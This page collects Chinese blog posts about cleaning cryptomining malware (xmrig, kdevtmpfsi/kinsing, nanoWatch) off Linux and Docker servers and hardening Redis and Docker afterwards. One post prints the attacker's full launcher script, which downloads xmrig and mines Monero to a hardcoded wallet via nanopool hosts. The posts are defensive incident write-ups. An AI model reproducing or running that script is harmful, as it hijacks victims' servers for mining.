2020-03-22 14:10:49 huangxiangdi 阅读数 45
  • 玩转Linux:常用命令实例指南

    本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合案例实战让你融汇贯通 。课程通俗易懂,简洁流畅,适合0基础以及对Linux掌握不熟练的人学习; 注意: 1、本课程原价99元,现在仅需29元!购课就送5门价值300元的编程课! 2、购课后登陆csdn学院官网,在课程目录页面即可下载课件。 学完即可轻松应对工作中 85% 以上的 Linux 使用场景 【限时福利】 1)购课后按提示添加小助手,进答疑群,还可获得价值300元的编程大礼包! 2)本课程【现在享受秒杀价39元】 3)本月购买此套餐加入老师答疑交流群,可参加老师的免费分享活动,学习最新技术项目经验。 注意: 1)现在购买至少享受60元优惠; 2)购课后添加微信eduxy-1,发送订单截图领取300元编程礼包。 --------------------------------------------------------------- 这门课程,绝对不会让你觉得亏! 29元=掌握Linux必修知识+社群答疑+讲师社群分享会+300元编程礼包。   人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。   在这门课中,我们保证你能收获到这些 1)快速掌握 Linux 常用命令及配置 2)Linux核心知识点 3) 文件、进程、磁盘、用户管理,以及网络工具命令、文件传输等 4)Vi/Vim编辑器用法  

    7156 人正在学习 去看看 良许

标题:linux被挖矿,处理xmrig、kdevtmpfsi挖矿程序

这两天老是收到阿里的警告:
在这里插入图片描述
已经明显提示被挖矿可有后台可疑程序在运行

1.排查:

命令行输入:

top

在这里插入图片描述

发现两个可疑程序,分别是 xmrigkdevtmpfsi 通过百度发现两个都是挖矿程序。

2.排查:

在使用top命令查看时发现这两个挖矿程序时有时无,初步怀疑是定时运行的。

1.使用kill -9将进程杀死:

kill -9 pid

在这里插入图片描述
再次使用top命令查看时发现还在运行,再次深入。

2.查看定时任务:

crontab -l

在这里插入图片描述
发现无异样???陷入沉思。

。。

。。。

。。。。

3.使用全盘查找这两个挖矿程序:

find / -name xmrig
find / -name kdevtmpfsi

在这里插入图片描述
发现全部是在docker目录下的,所以断定时docker在使用的过程中被攻击并植入了挖矿程序。

3.处理

断定了是docker出现的问题,查看docker中运行的容器:

docker stats $(docker ps --format={{.Names}})

在这里插入图片描述

我得个乖乖有一个直接飙135%多的cpu占有率的容器。

1.删除掉该容器:

docker rm -f 容器id

2.删除掉不是自己拉取的镜像:

docker rmi -f 镜像id

3.再次使用top查看程序占用率

发现没有占有率比较高的离谱的进程ok了。

看一下服务器运行的监控:

系统各项指标呈直线下滑状态,恢复了平静。
在这里插入图片描述

4.后续处理

问题分析:

为什么会通过docker进行植入挖矿程序:

1.开启了docker的远程访问,但是为设置访问认证

2.使用来历不明的镜像

3.安装的docker非来自官方

等等。。

我存在的问题分析

使用了IDEA开发工具一键部署到docker,docker开启了远程访问,并且未设置访问认证。

处理方式:

1.因为docker开启了远程访问,为了安全起见设置docker的CA认证来保证安全,甚至改端口。

2.通过在阿里控制台得知了攻击方的ip可以使用防火墙进行拦截。

2018-12-12 15:06:47 sunfragrence 阅读数 888
  • 玩转Linux:常用命令实例指南

    本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合案例实战让你融汇贯通 。课程通俗易懂,简洁流畅,适合0基础以及对Linux掌握不熟练的人学习; 注意: 1、本课程原价99元,现在仅需29元!购课就送5门价值300元的编程课! 2、购课后登陆csdn学院官网,在课程目录页面即可下载课件。 学完即可轻松应对工作中 85% 以上的 Linux 使用场景 【限时福利】 1)购课后按提示添加小助手,进答疑群,还可获得价值300元的编程大礼包! 2)本课程【现在享受秒杀价39元】 3)本月购买此套餐加入老师答疑交流群,可参加老师的免费分享活动,学习最新技术项目经验。 注意: 1)现在购买至少享受60元优惠; 2)购课后添加微信eduxy-1,发送订单截图领取300元编程礼包。 --------------------------------------------------------------- 这门课程,绝对不会让你觉得亏! 29元=掌握Linux必修知识+社群答疑+讲师社群分享会+300元编程礼包。   人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。   在这门课中,我们保证你能收获到这些 1)快速掌握 Linux 常用命令及配置 2)Linux核心知识点 3) 文件、进程、磁盘、用户管理,以及网络工具命令、文件传输等 4)Vi/Vim编辑器用法  

    7156 人正在学习 去看看 良许

记一次挖矿程序入侵以及解决实操!

1,过程记录

系统被挖矿程序入侵,导致系统CPU飙升。kill掉进程后自动重启。

无论kill -9还是直接把系统中nanoWatch所对应的进程文件删除,一样会定时重启。

使用crontab -e查看当前系统的定时任务信息,如下:

显示定时从链接中下载文件,于是在浏览器中访问该地址,下载的文件截图如下:

很明显,这是一个恶意脚本,定时检查下载,并杀掉系统其它部分进程。

并且定时任务文件显示的内容和redis有关,立马联想到前端时间刚安装的redis,存在的安全漏洞问题!(之前安装redis都是在局域网中,现在使用云服务器把密码设置给忘了。。。)

2,解决思路

1,crontab -e查看系统定时任务是否有恶意下载链接

2. top命令查看当前耗CPU进程,找到该进程文件所在位置 。chmod -x nanoWatch  ,取消掉执行权限, 在没有找到根源前,千万不要删除 nanoWatch,因为删除了,过一回会自动有生成一个。

3. pkill nanoWatch  ,杀掉进程

4. service crond stop 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

3,解决步骤

1. 修复 redis 的后门,

1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

3. 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

4. 好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

 

2019-06-20 15:59:18 baidu_38368962 阅读数 71
  • 玩转Linux:常用命令实例指南

    本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合案例实战让你融汇贯通 。课程通俗易懂,简洁流畅,适合0基础以及对Linux掌握不熟练的人学习; 注意: 1、本课程原价99元,现在仅需29元!购课就送5门价值300元的编程课! 2、购课后登陆csdn学院官网,在课程目录页面即可下载课件。 学完即可轻松应对工作中 85% 以上的 Linux 使用场景 【限时福利】 1)购课后按提示添加小助手,进答疑群,还可获得价值300元的编程大礼包! 2)本课程【现在享受秒杀价39元】 3)本月购买此套餐加入老师答疑交流群,可参加老师的免费分享活动,学习最新技术项目经验。 注意: 1)现在购买至少享受60元优惠; 2)购课后添加微信eduxy-1,发送订单截图领取300元编程礼包。 --------------------------------------------------------------- 这门课程,绝对不会让你觉得亏! 29元=掌握Linux必修知识+社群答疑+讲师社群分享会+300元编程礼包。   人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。   在这门课中,我们保证你能收获到这些 1)快速掌握 Linux 常用命令及配置 2)Linux核心知识点 3) 文件、进程、磁盘、用户管理,以及网络工具命令、文件传输等 4)Vi/Vim编辑器用法  

    7156 人正在学习 去看看 良许

这次不讲环境搭建了,毕竟都被挖矿了还讲个啥呢?

早上闲得发慌,想着要不装个redis把,毕竟项目中还是运用的比较多的,但由于redis可以不用设置密码,我想着不够安全,就改成了123456
结果到了下午,我从网上copy了一个tomcat监视重启的脚本,执行过后发现ps -ef|grep tomcat没有反应,这就有意思了,最起码得显示一条java进程的,当时怀疑是脚本问题,MD发博客为了搞别人服务器?于是就去删了脚本以及定时任务。但我惊奇的发现,定时任务的信息与前几天的不一样,不但我tomcat的定时任务不存在,反倒多出了一条定时任务?急急忙忙qq微信同事来咨询,最后,别人怀疑我被挖矿了!
还真的被挖矿了!还TM是非洲大金矿我靠,https://www.cnblogs.com/kobexffx/archive/2019/06/14/11000337.html
这篇博客是别人推荐解决问题的,我没试过,因为是自己的服务器直接给重装了。。。
还好我只是个点点点的小测试,大不了redis密码复杂点端口改一改就完了,背锅的事,交给网管把。

2020-01-04 09:30:28 qq_30217227 阅读数 532
  • 玩转Linux:常用命令实例指南

    本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合案例实战让你融汇贯通 。课程通俗易懂,简洁流畅,适合0基础以及对Linux掌握不熟练的人学习; 注意: 1、本课程原价99元,现在仅需29元!购课就送5门价值300元的编程课! 2、购课后登陆csdn学院官网,在课程目录页面即可下载课件。 学完即可轻松应对工作中 85% 以上的 Linux 使用场景 【限时福利】 1)购课后按提示添加小助手,进答疑群,还可获得价值300元的编程大礼包! 2)本课程【现在享受秒杀价39元】 3)本月购买此套餐加入老师答疑交流群,可参加老师的免费分享活动,学习最新技术项目经验。 注意: 1)现在购买至少享受60元优惠; 2)购课后添加微信eduxy-1,发送订单截图领取300元编程礼包。 --------------------------------------------------------------- 这门课程,绝对不会让你觉得亏! 29元=掌握Linux必修知识+社群答疑+讲师社群分享会+300元编程礼包。   人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。   在这门课中,我们保证你能收获到这些 1)快速掌握 Linux 常用命令及配置 2)Linux核心知识点 3) 文件、进程、磁盘、用户管理,以及网络工具命令、文件传输等 4)Vi/Vim编辑器用法  

    7156 人正在学习 去看看 良许

前几天两台线上的centos7遭遇了挖矿病毒  每天的cpu都是跑满的状态  进程名为:trace   实际文件名为:xmrig

捋一下处理流程:

看看一下进程号。然后 ls -l /proc/进程号/exe   看一下启动程序的路径  然后发现在/home下   home下有程序及启动的脚本

然后把程序及脚本取消掉执行权限  就放下了。

结果第二天他还跑起来了,之后我把文件删除,改了root密码及ssh远程端口,删除了所有key,在crontab及at里也没有发现计划任务。find查找了所有相关名称的,并一个一个的查看,都没问题。

然后第三天又自动运行起来了,猜测可能是rancher和docker出了问题。生产环境的服务器,没有办法清理,所以只能搁下,写了脚本实时监控,已经没有发生这个问题了。但是阿里云还是天天会报有矿池通信。

我把监控脚本及挖矿程序的脚本都放在下面,各位小伙伴可以观看一下。如有好的解决办法,请下方评论一下,感谢。

vim jkxmrig.sh   (监控挖矿程序的脚本)
#!/bin/bash
while true 
do
trace=`ps -ef | grep trace | grep -v grep | awk '{print $2}'`
if [ -z "$trace" ];
then
  echo "[ not find trace pid ]"
else
 echo "find result: $trace "
 kill -9 $trace
fi
done

chmod +x jkxmrig.sh
~      
nohup ./jkxmrig.sh > /dev/null 2>&1 &
(此为挖矿程序的运行脚本)
#!/bin/bash

if pgrep trace; then pkill trace; fi

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";

rm -rf config.json;

d () {
	curl -L --insecure --connect-timeout 30 --max-time 800 --fail "$1" -o "$2" 2> /dev/null || wget --no-check-certificate --timeout 800 --tries 1 "$1" -O "$2" 2> /dev/null || _curl "$1" > "$2";
}

test ! -s trace && \
    d https://github.com\xmrig/xmrig/releases/download/v5.0.0/xmrig-5.0.0-xenial-x64.tar.gz trace.tgz && \
    tar -zxvf trace.tgz && \
    mv xmrig-5.0.0/xmrig trace && \
    rm -rf xmrig-5.0.0 && \
    rm -rf trace.tgz;
test ! -x trace && chmod -x trace;

k() {
    ./trace \
        -r 2 \
        -R 2 \
        --keepalive \
        --no-color \
        --donate-level 1 \
        --max-cpu-usage 85 \
        --cpu-priority 3 \
        --print-time 25 \
        --threads "${threadCount:-4}" \
        --url "$1" \
        --user 46sfbbM3XSjBo54d5a8PYUU5yQ31x6Rpv6tBhe22Cd7VYeJUyFUhzBF5rTf1oTB1d8MqgHxX5RbbEEKZd8fBAAmcFfv9Y5c \
        --pass x \
        --coin xmr \
        --keepalive
}

k xmr-asia1.nanopool.org:14444 || k xmr-eu2.nanopool.org:14444 || k xmr-us-east1.nanopool.org:14444 || k xmr-us-west1.nanopool.org:14444 || k xmr-asia1.nanopool.org:14444 || k xmr-jp1.nanopool.org:14444

 

2019-12-27 10:07:19 woshixiaojunle 阅读数 331
  • 玩转Linux:常用命令实例指南

    本课程以简洁易懂的语言手把手教你系统掌握日常所需的Linux知识,每个知识点都会配合案例实战让你融汇贯通 。课程通俗易懂,简洁流畅,适合0基础以及对Linux掌握不熟练的人学习; 注意: 1、本课程原价99元,现在仅需29元!购课就送5门价值300元的编程课! 2、购课后登陆csdn学院官网,在课程目录页面即可下载课件。 学完即可轻松应对工作中 85% 以上的 Linux 使用场景 【限时福利】 1)购课后按提示添加小助手,进答疑群,还可获得价值300元的编程大礼包! 2)本课程【现在享受秒杀价39元】 3)本月购买此套餐加入老师答疑交流群,可参加老师的免费分享活动,学习最新技术项目经验。 注意: 1)现在购买至少享受60元优惠; 2)购课后添加微信eduxy-1,发送订单截图领取300元编程礼包。 --------------------------------------------------------------- 这门课程,绝对不会让你觉得亏! 29元=掌握Linux必修知识+社群答疑+讲师社群分享会+300元编程礼包。   人工智能、物联网、大数据时代,Linux正有着一统天下的趋势,几乎每个程序员岗位,都要求掌握Linux。本课程零基础也能轻松入门。   在这门课中,我们保证你能收获到这些 1)快速掌握 Linux 常用命令及配置 2)Linux核心知识点 3) 文件、进程、磁盘、用户管理,以及网络工具命令、文件传输等 4)Vi/Vim编辑器用法  

    7156 人正在学习 去看看 良许

kdevtmpfsi

说到这个玩意我真不晓得干啥的 反正遇到它基本没好事

查看cpu运行状况

1.top

top
会发现kdevtmpfsi 这个线程机会把cpu跑满了

杀死这个线程

1.错误实例
平时我们都是 直接kill -9 (PID) 把这个线程干掉了
有时候 还find / -name kdevtmpfsi
发现再 /tmp/kdevtmpfsi 这个文件
然后我们 rm -rf /tmp/kdevtmpfsi 把这个文件删除了
这么一小段时间会没有问题 可是过了一会儿这个线程就又启动了继续把cpu跑满了

2.问题所在
这个线程重复启动的原因是它还有一个守护线程在运行,检测到这个线程挂掉的时候就去重新启动,从而导致我们周而复始的出现这个问题

3.找到线程和守护线程
pstree -a
pstree -a
这时候我们就可以找到kdevtmpfsi线程 和它的守护线程kinsingDsv7Ubga

4.到的并kill线程和它的守护线程
在这里插入图片描述
然后直接kill - 9(Pid) 杀死这俩个线程
find / -name kdevtmpfsi
find / -name kinsing
在这里插入图片描述
5.查找可疑定时任务
crontab -l
可以定时任务
删除可以定时任务
**crontab -e **
编辑删除定时任务即可

没有更多推荐了,返回首页